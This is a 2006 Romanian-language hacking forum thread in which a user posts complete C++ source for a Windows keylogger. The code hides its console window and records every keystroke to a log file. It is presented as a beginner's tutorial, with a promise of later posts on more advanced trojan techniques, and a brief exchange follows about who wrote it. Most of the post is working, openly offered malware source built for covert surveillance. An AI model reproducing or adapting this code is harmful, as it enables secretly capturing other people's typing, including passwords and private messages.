SlicK Posted December 12, 2006 Report Posted December 12, 2006 Un exepmplu foarte simplu despre cum sa iti faci propriul keylogger in C++.Sunt foarte multe multe coduri aproape identice cu acesta pe net dar este foarte bun pentru incepatori.#include <windows.h>#include <stdio.h>int main(){ AllocConsole(); //alocam o consola ShowWindow(FindWindowA("ConsoleWindowClass",NULL),0); //ascundem consola de user FILE *Log; short key; char szKey[MAX_PATH]; int scan; while(1) // loop infinit { Sleep(10); //pentru a evita "CPU Usage 100%" for(key=0;key<256;key++) //incercam toate codurile tastelor { if(GetAsyncKeyState(key)==-32767) //o tasta este apasata { scan=MapVirtualKeyEx(key,0,GetKeyboardLayout(0)); //traducem codul tastei GetKeyNameText(scan << 16,szKey,MAX_PATH); //numele tastei Log=fopen ("log.txt","a+"); // deschidem fisierul fprintf(Log,"[%s]",szKey); //scriem numele tastei in log fclose(Log); //inchidem fisierul } } }}Eu personal l-am compilat cu Dev-C++ dar puteti incerca cu orice alt compilator C++.Daca va da o eroare adaugati "#include <iostream>" sau "#include <iostream.h>"Sper sa il intelegeti pentru ca mai tarziu o sa postez despre tehnici mai avansate legate de trojane Quote
stdioh Posted December 12, 2006 Report Posted December 12, 2006 ...tu lai facut...sau ai copiat codul sursa de undeva??? Quote
SlicK Posted December 12, 2006 Author Report Posted December 12, 2006 Da eu l-am facut mai de mult acum doar i-am adugat comentariile.API-urile GetAsyncKeyState(),MapVirtualKeyEx() si GetKeyNameText() le-am gasit pe MSDN Quote